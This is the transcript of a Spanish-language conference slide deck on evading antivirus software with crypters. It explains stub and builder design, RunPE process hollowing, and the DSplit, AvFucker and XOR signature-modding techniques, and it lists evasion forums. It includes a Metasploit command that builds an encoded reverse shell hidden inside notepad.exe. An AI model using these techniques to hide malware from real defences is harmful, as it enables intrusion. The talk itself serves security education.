Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
-
Upload
incide -
Category
Technology
-
view
790 -
download
0
description
Transcript of Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasión de Anti-Virus: Uso de Crypters
Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14
Whoamincd:~ apasamar$ whoami apasamar [email protected] @apasamar a.k.a brajan ncd:~ apasamar$ cat apasamar.cv Ingeniero superior y Máster en seguridad de la información Socio fundador de INCIDE: Expertos en prueba electrónica Forensics / Periciales Respuesta a incidentes Consultoría/Auditoría de Seguridad !ncd:~ apasamar$ rm apasamar.cv
de qué va esto...• Introducción
• AV’s como funcionan
• Tipos de malware y detección AV’s
• Medidas de evasión
• Auto-cifrado, Polimorfismo, Ofuscación, Compresión
• Crypters
• tipos y funcionamiento
• stub
• stub FUD
• técnicas Modding
• Recursos
introducción
• MALWARE = $$$$$$$$$
• BOTNETS, APT, RANSOMWARE
• Empresas AV’s —> Detectar MALWARE
• Malos: INDETECTAR MALWARE
introducción
• MALWARE = $$$$$$$$$
• BOTNETS, APT, RANSOMWARE
• Empresas AV’s —> Detectar MALWARE
• Malos: INDETECTAR MALWARE
introducciónObjetivo de los Malos:
introducciónObjetivo de los Malos:
AV’s howto• Los AntiVirus escanean binarios EN DISCO
• NO analizan la memoria, sino los binarios en disco que arrancan procesos
• Buscan firmas: cadenas binarias (BBDD)
• Buscan elementos/técnicas maliciosas (Heurística): APIS, funciones, XOR, etc
• Sandbox (ejecución parcial): búsqueda de técnicas de descifrado, etc
AV’s howto
EJECUTABLE
DISCO
RAM
PRO
CES
O?
SCAN?
AV
AV’s howto• Proceso análisis de los AV’s:
Ataques
AV’s howto
• Recomendado:
“Abusing File Processing in Malware
Detectors for Fun and Profit” (2012)
Suman Jana and Vitaly Shmatikov
The University of Texas at Austin
AV’s howto• Metasploit Framework (Rapid7)
• Community Edition:
• msfpayload windows/shell/reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe
• Pro Edition:
• Generate AV-evading Dynamic Payloads
tipos de malware y detección AV’s
• Programas espía comerciales: (white list, firmados)
• e-blaster
• 007
• perfect keylogger
• Malware recién creado:
• detección baja (sin firmas)
• posible detección heurística
tipos de malware y detección AV’s
• Malware existente: (muy conocidos, firmas y heurística)
• troyanos
• downloaders
• stealers
• reverse shells
• ...
tipos de malware y detección AV’s
¿cómo se puede indetectar el malware ya detectado ?
• C r y p t e r s:
• Software que permite cifrar CUALQUIER MALWARE para hacerlo indetectable a los antivirus.
• La rutina de descifrado tiene que poder ejecutarse (no se cifra)
crypters
builder / stub
• Builder:
• Encargado de crear el ejecutable compuesto por el STUB y el MALWARE CIFRADO
• Stub:
• Encargado de descifrar el MALWARE CIFRADO y ejecutarlo
!!!!!!!!!
CRYPTER + STUB
STUB
MALWARE DETECTADO
MALWARE CIFRADO
STUB
CRYPTER (Builder)
XOR, RC4, ...
exe dll
recurso
builder / stub
STUB MALWARE CIFRADO
STUB MALWARE CIFRADOKEY
Sepa
rado
r
Sepa
rado
r
También se puede usar un recurso
builder / stub
• Tipos de crypters:
• ScanTime
• RunTime
builder / stub
• ScanTime
STUB MALWARE CIFRADO MALWARE DETECTADO
DISCO
AV
stub
• RunTime
STUB MALWARE CIFRADO
DISCO
RAM
MA
LWA
RE D
ETEC
TAD
O
AV
stub
• Componentes STUB:
• Rutina Decrypt
• RunPe
!
stub
RunPE o Dynamic ForkingCreateProcess
PRO
CES
O
1(CREATE_SUSPENDED)
GetThreadContext
PEB EBX
EAX
BaseAddress 1
EP I
+8
PRO
CES
O
2
ReadFile WriteProcessMemoryEP 2
BaseAddress 2
SetThreadContextResumeThread
FUD
• Objetivo: Stub FUD (Full UnDetectable)
• Indetección desde Fuente (Source)
• Indetección desde Binario
• ¿Cómo?
• MODDING
modding source• A mano o con ofuscadores:
• Reemplazar funciones (SPLIT,..)
• Reemplazar y/o ofuscar funciones/strings/variables y Cifrar con rot13 o Hex
• Cifrados: RC4 y XOR quemadas
• Alternativas: TEA, DES, etc
• RunPE alternativos
• APIs Falsas
• TLB (Tab Library File)
• Trash code
modding binario• Indetección desde Binario:
• Se utilizan diferentes técnicas como:
• Dsplit/AvFucker
• SignatureFucker
• Hexing
• RIT
• XOR y variantes
• Tips
• Se modea el STUB, el BUILDER no es parte del malware in the wild
• Se buscan las FIRMAS o puntos de detección
• Firmas sencillas
• Firmas Múltiples
• Heurística
modding binario
AV’s howto
• Recomendado:
“Bypassing Anti-Virus Scanners” (2012)
InterNOT Security Team
• ¿Rutina CIFRADO/DESCIFRADO dentro del STUB?
stub.exe
EP
Firmas stub.exe
OLD EP
Firmas
NEW EP
CIFRADO
Descifrado
modding binario
• SCAN DEL STUB ORIGINAL
modding binario
• RUTINA DE CIFRADO
• NEW EP
• INSERTAR RUTINA
• .text SECTION
• desde 1050
• hasta import table
modding binario
• RUTINA CIFRADO EN NEW EP
modding binario
• RUTINA DESCIFRADO Y EJECUCIÓN EN NEW EP
modding binario
• SCAN DEL STUB MODIFICADO
modding binario16 AV’s KO
• TÉCNICAS:
• Dsplit/AvFucker
• SignatureFucker
• Hexing
• RIT
• XOR y variantes
• Tips
modding binario
• Técnica DSplit:
Cabecera Cuerpo EXE
Cabecera Cuerpo EXE
1000 bytes
Cabecera Cuerpo EXE
2000 bytes
Cabecera Cuerpo EXE
3000 bytes
Cabecera Cuerpo EXE
··· Nx1000 bytes
modding binario
• Técnica AvFucker:
Cabecera Cuerpo EXE
Cuerpo EXECabecera 0000000000
1000 bytes
Cabecera Cuerpo EXE0000000000
1000 bytes
Cabecera Cuerpo EXE0000000000
1000 bytes
Cabecera Cuerpo EXE
···0000000000
1000 bytes
modding binario
• Técnica RIT
• localizar firma
• si son instrucciones partir flujo
• saltar a otro punto (hueco)
• finalizar las instrucciones
• retornar al punto posterior
!
modding binario
• Técnica XOR
• localizar firma/s
• aplicar XOR con un valor p.e. 22
• Modificar EP o saltar a un hueco
• aplicar XOR 22
• retornar al punto posterior
!
!
modding binario
Detectado (EP):
XOR de los bytes detectados:
Nuevo EP ( Instruccione XOR reverso):
modding binario
otras técnicas
• Añadir APIs Falsas
• Edición Hexadecimal de cadenas
• Mover/cambiar direcciones de llamadas a las funciones
• Cambiar llamadas por nombre/offeset
• Introducir en STUB la función de la DLL detectada
!
recursos
• http://www.indetectables.net
• http://www.udtools.net
• http://www.masters-hackers.info
• http://www.level-23.biz/
• http://www.corp-51.net/
• http://www.underc0de.org
!
Avda. Diagonal, 640 6ª Planta
08017 Barcelona
http://www.incide.es
http://www.twitter.com/1NC1D3
http://www.atrapadosporlosbits.com
http://www.youtube.com/incidetube
Companies > INCIDE - Investigación Digital
Tel./Fax. +34 932 546 277 / +34 932 546 314
¿ P R E G U N T A S ?